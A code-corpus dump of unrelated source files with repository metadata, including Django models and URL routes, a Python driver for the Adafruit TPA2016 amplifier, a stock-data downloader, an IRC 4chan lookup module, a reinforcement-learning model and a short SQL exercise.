typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#BitumineuzeLaag',
attribuutURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#BitumineuzeLaag.bindmiddelType',
dotnotation='bindmiddelType',
defaultWaarde='polymeerbitumen',
range='',
usagenote='',
isMeetstaatAttr=0,
isAltijdInTeVullen=0,
isBasisMapping=1,
mappingStatus='gemapt 2.0',
mappingOpmerking='',
standaardpostnummer='0602.61215')
, StandaardPostMapping(
typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#BitumineuzeLaag',
attribuutURI='https://wegenenverkeer.data.vlaanderen.be/ns/abstracten#LaagDikte.dikte',
dotnotation='dikte',
defaultWaarde='5',
range='',
usagenote='cm^^cdt:ucumunit',
isMeetstaatAttr=0,
isAltijdInTeVullen=0,
isBasisMapping=1,
mappingStatus='gemapt 2.0',
mappingOpmerking='',
standaardpostnummer='0602.61215')
, StandaardPostMapping(
typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#BitumineuzeLaag',
attribuutURI='https://wegenenverkeer.data.vlaanderen.be/ns/abstracten#Laag.oppervlakte',
dotnotation='oppervlakte',
defaultWaarde='',
range='',
usagenote='m2^^cdt:ucumunit',
isMeetstaatAttr=1,
isAltijdInTeVullen=1,
isBasisMapping=1,
mappingStatus='gemapt 2.0',
mappingOpmerking='',
standaardpostnummer='0602.61215')])
| [
"[email protected]"
] | |
51218db60992a0598c11d71f2a2840fd04fe9494 | 4e6caa29a341e8e3964855172af4b89d683ff65f | /orders/models.py | d2030a34d7e0aace750b9adea2fb7d4d6f9d3e26 | [] | no_license | sadakchap/basic-ecommerce-site | 2112e758ac0d9074a18c50f6a0955c0ab82ff01d | b1f9990eaebb260a3c338fda61f8c426953faad8 | refs/heads/master | 2022-12-25T11:04:16.247128 | 2021-06-02T01:47:00 | 2021-06-02T01:47:00 | 212,818,635 | 0 | 0 | null | 2022-12-08T06:40:57 | 2019-10-04T13:14:44 | JavaScript | UTF-8 | Python | false | false | 1,301 | py | from django.db import models
from shop.models import Product
# Create your models here.
class Order(models.Model):
first_name = models.CharField(max_length=255)
last_name = models.CharField(max_length=255)
email = models.EmailField()
address = models.CharField(max_length=255)
postal_code = models.CharField(max_length=10)
city = models.CharField(max_length=200)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
paid = models.BooleanField(default=False)
braintree_id= models.CharField(max_length=150,blank=True)
def __str__(self):
return 'Order {}'.format(self.id)
class Meta:
ordering = ('-created',)
def get_total_cost(self):
return sum([i.get_cost() for i in self.items.all()])
class OrderItem(models.Model):
order = models.ForeignKey(Order,on_delete=models.CASCADE,related_name='items')
product = models.ForeignKey(Product,on_delete=models.CASCADE,related_name='order_items')
price = models.DecimalField(max_digits=10,decimal_places=2)
quantity= models.PositiveIntegerField(default=1)
def __str__(self):
return '{}'.format(self.id)
def get_cost(self):
return self.price * self.quantity
| [
"[email protected]"
] | |
981bf9717f31d66e32777202e08d7e15847fb7fd | 9b3f578e63a7e17e2b1bab5f38aa8625b8a80251 | /descarteslabs/workflows/models/versionedgraft.py | 5c4b26227aef784da05648dcf5da73da4df46673 | [
"Apache-2.0"
] | permissive | carderne/descarteslabs-python | e6f7000f08cd1569e0ddd0f7fb8e53abb6765183 | 757b480efb8d58474a3bf07f1dbd90652b46ed64 | refs/heads/master | 2022-12-09T23:19:02.361226 | 2020-08-13T11:52:30 | 2020-08-13T11:52:30 | 287,264,851 | 0 | 0 | NOASSERTION | 2020-08-13T11:46:58 | 2020-08-13T11:46:57 | null | UTF-8 | Python | false | false | 5,341 | py | import json
import textwrap
from descarteslabs.common.graft import client as graft_client
from descarteslabs.common.proto.workflow import workflow_pb2
from descarteslabs.workflows import _channel
from descarteslabs.workflows.cereal import deserialize_typespec, serialize_typespec
from descarteslabs.workflows.client import get_global_grpc_client
class VersionedGraft:
"""
A specific version of a Workflow.
Except in advanced cases, you shouldn't need to interact with this object much—you'll primarily
use the `Workflow` object and `wf.use <.models.use>`.
"""
def __init__(self, version, proxy_object, docstring="", labels=None):
"""
Construct a VersionedGraft object from a proxy object.
You shouldn't construct a `VersionedGraft` directly; use `Workflow.set_version`
or `wf.publish <.models.publish>` instead.
Parameters
----------
version: str
Version of the graft. This should adhere to the semantic versioning schema (https://semver.org).
proxy_object: Proxytype
The proxy object source of the graft.
docstring: str, default ""
Docstring for the VersionedGraft.
labels: dict, optional
Key-value pair labels to add to the VersionedGraft.
Returns
-------
VersionedGraft
"""
typespec = serialize_typespec(type(proxy_object))
graft = proxy_object.graft
message = workflow_pb2.VersionedGraft(
version=version,
serialized_graft=json.dumps(graft),
channel=_channel.__channel__,
typespec=typespec,
docstring=textwrap.dedent(docstring),
labels=labels,
)
self._object = proxy_object
self._message = message
@classmethod
def get(cls, workflow_id, version, client=None):
"""
Get a specific `VersionedGraft` of a `Workflow`.
Parameters
----------
workflow_id: str
The ID of the `Workflow`.
version: str
The version of the `Workflow` that you wish to fetch.
client: `.workflows.client.Client`, optional
Allows you to use a specific client instance with non-default
auth and parameters.
Returns
-------
VersionedGraft
"""
if client is None:
client = get_global_grpc_client()
req = workflow_pb2.GetVersionRequest(id=workflow_id, version=version)
versioned_graft_message = client.api["GetVersion"](
req, timeout=client.DEFAULT_TIMEOUT
)
return cls._from_proto(versioned_graft_message)
@classmethod
def _from_proto(cls, message):
"""
Low-level constructor for a `VersionedGraft` object from a Protobuf message.
Do not use this method directly; use `VersionedGraft.__init__`
or `VersionedGraft.get` instead.
Parameters
----------
proto_message: workflow_pb2.VersionedGraft message
Protobuf message for the VersionedGraft
Returns
-------
VersionedGraft
"""
obj = cls.__new__(cls) # bypass __init__
obj._message = message
obj._object = None
return obj
@property
def type(self):
"""type: The type of the proxy object."""
return type(self.object)
@property
def version(self):
"""str: The version of this `VersionedGraft`."""
return self._message.version
@property
def labels(self):
"""dict: The labels attached to this `VersionedGraft`."""
return self._message.labels
@property
def channel(self):
"""str: The channel under which this `VersionedGraft` was created."""
return self._message.channel
@property
def docstring(self):
"""str: The docstring for this `VersionedGraft`."""
return self._message.docstring
@property
def object(self):
"""
Proxytype: The proxy object of this Workflow.
Raises ValueError if the VersionedGraft is not compatible with the current channel.
"""
if self.channel != _channel.__channel__:
raise ValueError(
"This client is compatible with channel '{}', "
"but the VersionedGraft is only defined for channel '{}'.".format(
_channel.__channel__, self.channel
)
)
if self._object is None:
proxy_type = deserialize_typespec(self._message.typespec)
graft = json.loads(self._message.serialized_graft)
isolated = graft_client.isolate_keys(graft)
proxy_obj = proxy_type._from_graft(isolated)
proxy_obj.__doc__ = self.docstring
self._object = proxy_obj
return self._object
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self._message == other._message
def __repr__(self):
return """\
VersionedGraft: {self.version}
- type: {self.type.__name__}
- labels: {self.labels}
- channel: {self.channel}
{docstring}
""".format(
self=self, docstring=textwrap.indent(self.docstring, " ")
)
| [
"[email protected]"
] | |
c9481cd2dcec110f75b2234f1c65a3c1766da112 | 543286f4fdefe79bd149ff6e103a2ea5049f2cf4 | /Exercicios&cursos/Curso_Py/escrevendo_arquivo.py | b357539a43c5f9dca9aea36886c29d852f520cae | [] | no_license | antonioleitebr1968/Estudos-e-Projetos-Python | fdb0d332cc4f12634b75984bf019ecb314193cc6 | 9c9b20f1c6eabb086b60e3ba1b58132552a84ea6 | refs/heads/master | 2022-04-01T20:03:12.906373 | 2020-02-13T16:20:51 | 2020-02-13T16:20:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py | arq = open("teste_aula.txt", "w")#w para escrever
arq.write("escreviiiiiiii\n")
arq.write("dnvvvvvvvvvvv\n")
arq.write("HAHAHA CHUPA")
arq.write("UHUUUUUU")
arq.close()
| [
"[email protected]"
] | |
72e597de56f9957f4ef37fa1adeabff299cde620 | ebcea394905df8222c257c8c6c469627a6e48095 | /djangoProject/mysite/Profile/admin.py | cba40e206156413afaf37126354b58225ad1a65d | [] | no_license | valiok98/Python-Qt5-Tensorflow | 2773cfc2a0e569ed53cf3d90066885f17abe8c6a | e03ccc2884b687a36fbe47f5ff320837be3e217a | refs/heads/master | 2021-09-17T20:41:01.908602 | 2018-03-31T12:42:25 | 2018-03-31T12:42:25 | 103,644,683 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | from django.contrib import admin
# Register your models here.
from .models import PersonalProfile, Item
class PProfile(admin.ModelAdmin):
list_display = ["f_name","l_name"]
class Meta:
model = PersonalProfile
admin.site.register(PersonalProfile,PProfile)
admin.site.register(Item) | [
"[email protected]"
] | |
6b597c229a07c5f8d530e8d7bded5e37bcd39348 | 730430ba3b45d5728ef044863598199bfa33aaaa | /examples/tutorials/homework/lesson3/dqn_mountaincar/model.py | 17c7a8d93a532884187abf0a8cb44d3823018e56 | [
"Apache-2.0"
] | permissive | PaddlePaddle/PARL | 062d1b4a5335553be6cdfc33ad12f07ebbcd7310 | 3bb5fe36d245f4d69bae0710dc1dc9d1a172f64d | refs/heads/develop | 2023-08-09T02:12:39.741551 | 2023-05-19T17:52:25 | 2023-05-19T17:52:25 | 131,044,128 | 3,818 | 988 | Apache-2.0 | 2023-07-28T03:59:20 | 2018-04-25T17:54:22 | Python | UTF-8 | Python | false | false | 1,140 | py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#-*- coding: utf-8 -*-
import parl
from parl import layers # 封装了 paddle.fluid.layers 的API
class Model(parl.Model):
def __init__(self, act_dim):
hid1_size = 128
hid2_size = 128
# 3层全连接网络
self.fc1 = layers.fc(size=hid1_size, act='relu')
self.fc2 = layers.fc(size=hid2_size, act='relu')
self.fc3 = layers.fc(size=act_dim, act=None)
def value(self, obs):
h1 = self.fc1(obs)
h2 = self.fc2(h1)
Q = self.fc3(h2)
return Q
| [
"[email protected]"
] | |
c5c5338564eb826c01194cf073d4ba304148170e | 39200f6d08ebeac0f147d3b2b6aaed980d2ce555 | /blog/urls.py | ce3882ff9612bb77ff64376fa9dd24a0c8c0a086 | [] | no_license | hemor/my-first-blog | 506a81b6dcda82a39aa24ecda65632b1d92ecbce | 525e002897fd9367ffa6fbfc9458bf2e477efab9 | refs/heads/master | 2020-03-28T02:08:04.116659 | 2016-06-01T17:40:35 | 2016-06-01T17:40:35 | 60,012,037 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 873 | py | from django.conf.urls import url
from . import views
app_name = 'blog'
urlpatterns = [
url(r'^$', views.post_list, name='post_list'),
url(r'^index/$', views.post_list, name='index'),
url(r'^post/(?P<pk>\d+)/$', views.post_detail, name='post_detail'),
url(r'^post/(?P<pk>\d+)/comment/$', views.add_comment_to_post,
name='add_comment_to_post'),
url(r'^post/(?P<pk>\d+)/edit/$', views.post_edit, name='post_edit'),
url(r'^post/(?P<pk>\d+)/publish/$', views.post_publish, name='post_publish'),
url(r'^post/(?P<pk>\d+)/delete/$', views.post_delete, name='post_delete'),
url(r'^post/new/$', views.post_new, name='post_new'),
url(r'^drafts/$', views.post_draft_list, name='post_draft_list'),
url(r'^comment/(?P<pk>\d+)/approve/$', views.comment_approve, name='comment_approve'),
url(r'^comment/(?P<pk>\d+)/delete/$', views.comment_delete, name='comment_delete'),
] | [
"[email protected]"
] | |
de41530ae7cbc92425d107c3f2e3e33d1b2dfa11 | 4e96f383d4703ad8ee58869ed91a0c8432c8a051 | /Cura/Uranium/UM/Operations/AddSceneNodeOperation.py | 3afab5a287b257c42b56bb5d7554760e5322b2c3 | [
"LGPL-3.0-only",
"GPL-3.0-only"
] | permissive | flight7788/3d-printing-with-moveo-1 | b2dba26010c4fa31815bc1d2d0966161a8600081 | 7fcb9c6b5da9245d54ac917de8c2a7f5148e42b0 | refs/heads/Feature_Marlin_with_AlanBoy | 2022-08-30T18:36:44.785058 | 2020-05-30T07:52:58 | 2020-05-30T07:52:58 | 212,583,912 | 0 | 0 | MIT | 2020-05-16T07:39:47 | 2019-10-03T13:13:01 | C | UTF-8 | Python | false | false | 1,597 | py | # Copyright (c) 2018 Ultimaker B.V.
# Uranium is released under the terms of the LGPLv3 or higher.
from UM.Operations.Operation import Operation
from UM.Scene.Selection import Selection
from UM.Scene.SceneNode import SceneNode
from typing import Optional
## Operation that adds a new node to the scene.
class AddSceneNodeOperation(Operation):
## Creates the scene node operation.
#
# This saves the node and its parent to be able to search for the node to
# remove the node if we want to undo, and to be able to re-do the adding
# of the node.
#
# \param node The node to add to the scene.
# \param parent The parent of the new node.
def __init__(self, node: SceneNode, parent: Optional[SceneNode]) -> None:
super().__init__()
self._node = node
self._parent = parent
self._selected = False # Was the node selected while the operation is undone? If so, we must re-select it when redoing it.
## Reverses the operation of adding a scene node.
#
# This removes the scene node again.
def undo(self) -> None:
self._node.setParent(None)
self._selected = Selection.isSelected(self._node)
if self._selected:
Selection.remove(self._node) # Also remove the node from the selection.
## Re-applies this operation after it has been undone.
def redo(self) -> None:
self._node.setParent(self._parent)
if self._selected: # It was selected while the operation was undone. We should restore that selection.
Selection.add(self._node)
| [
"[email protected]"
] | |
17be2a2f724ed85a36c7e4f509abbb858d0860c6 | 5be8f72affd219c36587914f9b769faa0475b97e | /adafruit_tpa2016.py | 182e51cfb3ad4da2b3abac2536eac00422cdec73 | [
"MIT"
] | permissive | kattni/Adafruit_CircuitPython_TPA2016 | 5ac09de14a91d411e7d2bd9783aca3c39d0b0598 | 902e6aa3190b9aa9f667204bf42a9d399e01bf79 | refs/heads/master | 2020-04-29T05:12:33.627067 | 2019-03-21T17:51:03 | 2019-03-21T17:51:03 | 175,874,171 | 0 | 0 | null | 2019-03-15T18:43:36 | 2019-03-15T18:43:36 | null | UTF-8 | Python | false | false | 9,955 | py | # The MIT License (MIT)
#
# Copyright (c) 2019 Kattni Rembor for Adafruit Industries
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
`adafruit_tpa2016`
================================================================================
CircuitPython driver for TPA2016 Class D Amplifier.
* Author(s): Kattni Rembor
Implementation Notes
--------------------
**Hardware:**
* `Adafruit TPA2016 - I2C Control AGC <https://www.adafruit.com/product/1712>`_
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://github.com/adafruit/circuitpython/releases
* Adafruit's Bus Device library: https://github.com/adafruit/Adafruit_CircuitPython_BusDevice
* Adafruit's Register library: https://github.com/adafruit/Adafruit_CircuitPython_Register
"""
from micropython import const
import adafruit_bus_device.i2c_device as i2cdevice
from adafruit_register.i2c_bits import RWBits
from adafruit_register.i2c_bit import RWBit
__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_TPA2016.git"
class TPA2016:
"""Driver for the TPA2016 class D amplifier.
:param busio.I2C i2c_bus: The I2C bus the TPA2016 is connected to.
"""
# Compression ratio settings
COMPRESSION_1_1 = const(0x0) # Ratio 1:1
COMPRESSION_2_1 = const(0x1) # Ratio 2:1
COMPRESSION_4_1 = const(0x2) # Ratio 4:1
COMPRESSION_8_1 = const(0x3) # Ratio 8:1
# NoiseGate threshold settings
NOISE_GATE_1 = const(0x0) # 1mV
NOISE_GATE_4 = const(0x1) # 4mV
NOISE_GATE_10 = const(0x2) # 10mV
NOISE_GATE_20 = const(0x3) # 20mV
_attack_control = RWBits(6, 0x02, 0)
_release_control = RWBits(6, 0x03, 0)
_hold_time_control = RWBits(6, 0x04, 0)
_fixed_gain_control = RWBits(6, 0x05, 0)
_output_limiter_level = RWBits(5, 0x05, 0)
_max_gain = RWBits(4, 0x07, 4)
speaker_enable_r = RWBit(0x01, 7)
"""Enables right speaker. Defaults to enabled. Set to ``False`` to disable."""
speaker_enable_l = RWBit(0x01, 6)
"""Enables left speaker. Defaults to enabled. Set to ``False`` to disable."""
amplifier_shutdown = RWBit(0x01, 5)
"""Amplifier shutdown. Amplifier is disabled if ``True``. Defaults to ``False``. If ``True``,
device is in software shutdown, e.g. control, bias and oscillator are inactive."""
reset_fault_r = RWBit(0x01, 4)
"""Over-current event on right channel indicated by returning ``True``. Reset by setting to
``False``."""
reset_Fault_l = RWBit(0x01, 3)
"""Over-current event on left channel indicated by returning ``True``. Reset by setting to
``False``."""
reset_thermal = RWBit(0x01, 2)
"""Thermal software shutdown indicated by returning ``True``. Reset by setting to ``False``."""
noise_gate_enable = RWBit(0x01, 0)
"""NoiseGate function enable. Enabled by default. Can only be enabled when compression ratio
is NOT 1:1. To disable, set to ``False``."""
output_limiter_disable = RWBit(0x06, 7)
"""Output limiter disable. Enabled by default when compression ratio is NOT 1:1. Can only be
disabled if compression ratio is 1:1. To disable, set to ``True``."""
noise_gate_threshold = RWBits(2, 0x06, 5)
"""Noise Gate threshold in mV. Noise gate settings are 1mV, 4mV, 10mV, and 20mV. Settings
options are NOISE_GATE_1, NOISE_GATE_4, NOISE_GATE_10, NOISE_GATE_20. Only functional when
compression ratio is NOT 1:1. Defaults to 4mV.
This example sets the noise gate threshold to 10mV.
..code-block:: python
import adafruit_tpa2016
import busio
import board
i2c = busio.I2C(board.SCL, board.SDA)
tpa = adafruit_tpa2016.TPA2016(i2c)
tpa.noise_gate_threshold = tpa.NOISE_GATE_10
"""
compression_ratio = RWBits(2, 0x07, 0)
"""The compression ratio. Ratio settings are: 1:1. 2:1, 4:1, 8:1. Settings options are:
COMPRESSION_1_1, COMPRESSION_2_1, COMPRESSION_4_1, COMPRESSION_8_1. Defaults to 4:1.
This example sets the compression ratio to 2:1.
..code-block:: python
import adafruit_tpa2016
import busio
import board
i2c = busio.I2C(board.SCL, board.SDA)
tpa = adafruit_tpa2016.TPA2016(i2c)
tpa.compression_ratio = tpa.COMPRESSION_2_1
"""
def __init__(self, i2c_bus):
self.i2c_device = i2cdevice.I2CDevice(i2c_bus, 0x58)
@property
def attack_time(self):
"""The attack time. This is the minimum time between gain decreases. Set to ``1`` - ``63``
where 1 = 0.1067ms and the time increases 0.1067ms with each step, for a maximum of 6.722ms.
Defaults to 5, or 0.5335ms.
This example sets the attack time to 1, or 0.1067ms.
..code-block:: python
import adafruit_tpa2016
import busio
import board
i2c = busio.I2C(board.SCL, board.SDA)
tpa = adafruit_tpa2016.TPA2016(i2c)
tpa.attack_time = 1
"""
return self._attack_control
@attack_time.setter
def attack_time(self, value):
if 1 <= value <= 63:
self._attack_control = value
else:
raise ValueError("Attack time must be 1 to 63!")
@property
def release_time(self):
"""The release time. This is the minimum time between gain increases. Set to ``1`` - ``63``
where 1 = 0.0137ms, and the time increases 0.0137ms with each step, for a maximum of
0.8631ms. Defaults to 11, or 0.1507ms.
This example sets release time to 1, or 0.0137ms.
..code-block:: python
import adafruit_tpa2016
import busio
import board
i2c = busio.I2C(board.SCL, board.SDA)
tpa = adafruit_tpa2016.TPA2016(i2c)
tpa.release_time = 1
"""
return self._release_control
@release_time.setter
def release_time(self, value):
if 1 <= value <= 63:
self._release_control = value
else:
raise ValueError("Release time must be 1 to 63!")
@property
def hold_time(self):
"""The hold time. This is the minimum time between attack and release. Set to ``0`` -
``63`` where 0 = disabled, and the time increases 0.0137ms with each step, for a maximum of
0.8631ms. Defaults to 0, or disabled.
This example sets hold time to 1, or 0.0137ms.
..code-block:: python
import adafruit_tpa2016
import busio
import board
i2c = busio.I2C(board.SCL, board.SDA)
tpa = adafruit_tpa2016.TPA2016(i2c)
tpa.hold_time = 1
"""
return self._hold_time_control
@hold_time.setter
def hold_time(self, value):
if 0 <= value <= 63:
self._hold_time_control = value
else:
raise ValueError("Hold time must be 0 to 63!")
@property
def fixed_gain(self):
"""The fixed gain of the amplifier in dB. If compression is enabled, fixed gain is
adjustable from ``–28`` to ``30``. If compression is disabled, fixed gain is adjustable
from ``0`` to ``30``.
The following example sets the fixed gain to -16dB.
..code-block:: python
import adafruit_tpa2016
import busio
import board
i2c = busio.I2C(board.SCL, board.SDA)
tpa = adafruit_tpa2016.TPA2016(i2c)
tpa.fixed_gain = -16
"""
return self._fixed_gain_control
@fixed_gain.setter
def fixed_gain(self, value):
if self.compression_ratio is not 0:
if -28 <= value <= 30:
ratio = (value & 0x3f)
self._fixed_gain_control = ratio
else:
raise ValueError("Gain must be -28 to 30!")
else:
if 0 <= value <= 30:
self._fixed_gain_control = value
else:
raise ValueError("Compression is disabled, gain must be 0 to 30!")
@property
def output_limiter_level(self):
"""The output limiter level in dBV. Must be between ``-6.5`` and ``9``, set in increments
of 0.5."""
return -6.5 + 0.5 * self._output_limiter_level
@output_limiter_level.setter
def output_limiter_level(self, value):
if -6.5 <= value <= 9:
output = int((value + 6.5) / 0.5)
self._output_limiter_level = output
else:
raise ValueError("Output limiter level must be -6.5 to 9!")
@property
def max_gain(self):
"""The max gain in dB. Must be between ``18`` and ``30``."""
return self._max_gain + 18
@max_gain.setter
def max_gain(self, value):
if 18 <= value <= 30:
max_value = value - 18
self._max_gain = max_value
else:
raise ValueError("Max gain must be 18 to 30!")
| [
"[email protected]"
] | |
6b0447a4f1e8917cc1625bd04e865f86499b4fa2 | 23e1f9af34f2f2c3f32f68a6176c7664cb7f62d7 | /legacy/daily/163/overview.py | f5d54088c3d930ebb955ac5055aba50cd24e7f87 | [] | no_license | jki14/the-cat-of-wall-street | 8bc95d812f0381c7e02bd65777ee9f44e17f73d9 | 5e1265a11bba7f3040c893043d5ac79fe5736b63 | refs/heads/master | 2021-10-11T11:27:18.297584 | 2019-01-25T08:51:22 | 2019-01-25T08:51:22 | 115,118,975 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,088 | py | # -*- coding: utf-8 -*-
import csv
import datetime
import json
import os
import socket
import sys
import time
import urllib2
tracking_list = ['sh000001', 'sz399001', 'sz399300']
foo = {}
try:
with open('./data/dbf/overview.dbf', 'r') as dbf:
foo = json.load(dbf)
except IOError:
foo['layout'] = ['DATE', 'TCLOSE','HIGH','LOW','TOPEN','LCLOSE','CHG','PCHG','TURNOVER','VOTURNOVER','VATURNOVER','TCAP','MCAP']
foo['record'] = {}
x = 0
y = len(tracking_list)
for code in tracking_list:
first = '19910101'
if code not in foo['record']:
foo['record'][code] = []
elif len(foo['record'][code])>0:
tmp = time.strptime(foo['record'][code][0][0], '%Y-%m-%d')
nxt = datetime.date(tmp.tm_year, tmp.tm_mon, tmp.tm_mday) + datetime.timedelta(1)
first = nxt.strftime('%Y%m%d')
code163 = code.replace('sh', '0').replace('sz', '1')
url = 'http://quotes.money.163.com/service/chddata.html?code=%s&start=%s&end=20380119&fields=TCLOSE;HIGH;LOW;TOPEN;LCLOSE;CHG;PCHG;TURNOVER;VOTURNOVER;VATURNOVER;TCAP;MCAP' % (code163, first)
rep = None
raw = None
sup = 0.0
while True:
try:
rep = urllib2.urlopen(url, timeout=1)
raw = list(csv.reader(rep))
except (urllib2.URLError, socket.error, socket.timeout) as e:
sup += 0.2
time.sleep(sup)
continue
break
bunk = []
for row in raw[1:]:
contents = [row[0]]
for i in xrange(3, 15):
cell = row[i]
if cell != '':
if cell != 'None':
cell = float(cell)
else:
cell = None
else:
cell = 0.0
contents.append(cell)
bunk.append(contents)
foo['record'][code] = bunk + foo['record'][code]
x += 1
print '%d/%d + %d' % (x, y, len(bunk))
sys.stdout.flush()
#time.sleep(0.2)
with open('./data/dbf/overview.dbf', 'w') as dbf:
json.dump(foo, dbf)
print 'dbf have been written successfully'
sys.stdout.flush()
| [
"[email protected]"
] | |
4661574ed6bcbdbcb9e401e4121736a4c790d8e6 | 0131f6d91da5b063b3d79330b014871c128c67ed | /irc/asparagus/modules/4chan.py | ebb414e01e4aa3612a6cdb9b84448a46a5a2afc9 | [
"Zlib"
] | permissive | moneytech/code-2 | f31602a702cc7e13b24c1ab5817d30d2314dde76 | d970038329f7c4e4f0ee9dcd1b345741dd0fcc51 | refs/heads/master | 2021-10-02T18:24:20.159492 | 2018-11-30T02:14:18 | 2018-11-30T02:14:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,174 | py | """
Copyright (c) 2013, Christine Dodrill
All rights reserved.
This software is provided 'as-is', without any express or implied
warranty. In no event will the authors be held liable for any damages
arising from the use of this software.
Permission is granted to anyone to use this software for any purpose,
including commercial applications, and to alter it and redistribute it
freely, subject to the following restrictions:
1. The origin of this software must not be misrepresented; you must not
claim that you wrote the original software. If you use this software
in a product, an acknowledgment in the product documentation would be
appreciated but is not required.
2. Altered source versions must be plainly marked as such, and must not be
misrepresented as being the original software.
3. This notice may not be removed or altered from any source
distribution.
"""
import requests
import re
NAME="4chan lookups"
DESC="4chan post info lookups"
FOURCHAN_REGEX = re.compile('(.+boards\.)4chan\.org\/([a-z0-9]+)\/res\/([1-9][0-9]+)')
def initModule(cod):
cod.s2scommands["PRIVMSG"].append(fourchanLookup)
def destroyModule(cod):
cod.s2scommands["PRIVMSG"].remove(fourchanLookup)
def rehash():
pass
def fourchanLookup(cod, line):
"""
This uses requests to scrape out things from the 4chan API
"""
global FOURCHAN_REGEX
if line.args[0] not in cod.channels:
return
chatline = line.args[-1]
postid = None
try:
board = FOURCHAN_REGEX.split(chatline)[2]
postid = FOURCHAN_REGEX.split(chatline)[3]
except:
return
try:
info = requests.get("http://api.4chan.org/%s/res/%s.json" % (board, postid)).json()
text = info["posts"][0]["com"].split("<br>")[0]
text = text.replace('<span class="quote">>', ">")
text = text.replace("</span>", "")
string = "^ fourchan: %s on /%s/ - %s" %\
(info["posts"][0]["name"], board, text)
cod.privmsg(line.args[0], string)
except Exception as e:
cod.privmsg(line.args[0], "There was some error looking up that post: %s" % e.message)
| [
"[email protected]"
] | |
3b3693eadafb982f2084a294eca435e9ca20ceee | 67bdebd561b19af9bf759b6ed5de8556b93ea91f | /trace_unless.py | f02ba6959a7ce84d5162f521cd3b15b0d53a8b8d | [] | no_license | rlowrance/re-avm | 91371ec79f6b6f48e17643da4dfb7a4894d0a0ca | d4cfa62e9f65d325e8ac98caa61d3fb666b8a6a2 | refs/heads/master | 2021-01-17T07:34:16.876133 | 2017-02-06T21:04:59 | 2017-02-06T21:04:59 | 42,865,972 | 31 | 10 | null | null | null | null | UTF-8 | Python | false | false | 316 | py | import pdb
def trace_unless(condition, message, **kwds):
'like assert condition, message; but enters debugger if condition fails'
if condition:
return
print '+++++++++++++++'
for k, v in kwds.iteritems():
print k, v
print message
print '+++++++++++++++'
pdb.set_trace()
| [
"[email protected]"
] | |
01f9a0bdf77391ac938617afd13a6195299dafb5 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /Wpbb6x9nHax55zKLX_14.py | 8e96679b72e16f74a7456684857920bfe30cdea7 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,103 | py | """
In many cases, **SQL** is used to select more than just columns in a table.
For example, you can filter your search by specifying conditions as seen
below:
SELECT * FROM Table
WHERE Name = "Bob";
* Again, we can use the asterisks to select all the data in a table.
* However, with the use of the WHERE keyword, only all of Bob's data is selected.
Name| Salary
---|---
Bob| 30000
In this challenge, fill in the query in the **Code** tab to select the
`Salary` from "Adam" in the `Employees` table.
### Original Table
Name| Salary
---|---
Adam| 50000
Bob| 30000
Charlotte| 45000
Dillon| 70000
Eileen| 70000
### Expected Results
Salary
---
50000
### Notes
* Check out the **Resources** tab for more SQL tutorials and exercises.
* When presented with more complex queries like this, it is best practice to format your code by putting each statement on separate lines!
* See the rest of the challenges in this series [here!](https://edabit.com/collection/ZEmuGy8zxzDQdBb5o)
"""
query = "SELECT salary FROM employees WHERE name = 'Adam'"
| [
"[email protected]"
] | |
52d6fc860067cda559eaca821a47486d2e8644ac | c4af67db4c523d20f2d55aef90ba77db1fb53c38 | /CMFDefault/Extensions/update_catalogIndexes.py | c86903bdb2a56bf53134126924f3d2287a8708e7 | [] | no_license | dtgit/dtedu | e59b16612d7d9ea064026bf80a44657082ef45a3 | d787885fe7ed0de6f9e40e9b05d852a0e9d60677 | refs/heads/master | 2020-04-06T05:22:50.025074 | 2009-04-08T20:13:20 | 2009-04-08T20:13:20 | 171,351 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 639 | py | from Products.CMFCore.utils import getToolByName
def update_catalogIndexes(self, REQUEST):
'''
External method to drop, re-add, and rebuild catalog Indexes for migrated
CMF sites from Zope 2.3 to 2.4+.
